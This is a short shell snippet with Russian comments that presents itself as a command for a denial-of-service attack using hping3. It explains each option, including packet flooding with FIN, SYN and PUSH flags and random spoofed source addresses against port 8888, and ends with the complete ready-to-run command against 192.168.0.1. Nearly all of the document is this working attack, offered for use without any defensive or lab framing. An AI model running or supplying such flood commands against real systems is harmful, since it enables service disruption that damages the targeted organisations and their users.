# Команда для выполнения DoS-атаки с помощью hping3
# ---------------------------------------------------------
# Описание:
# Эта команда генерирует трафик с флагами FIN, SYN и PUSH, используя случайные исходные IP-адреса.
# Трафик отправляется на порт 8888 целевой системы.
#
# Параметры:
#   -F: Устанавливает флаг FIN.
#   -S: Устанавливает флаг SYN.
#   -P: Устанавливает флаг PUSH.
#   --flood: Режим непрерывной отправки пакетов.
#   -p 8888: Целевой порт.
#   --rand-source: Использование случайных исходных IP-адресов.
#
# Команда:
sudo hping3 -F -S -P --flood -p 8888 --rand-source 192.168.0.1
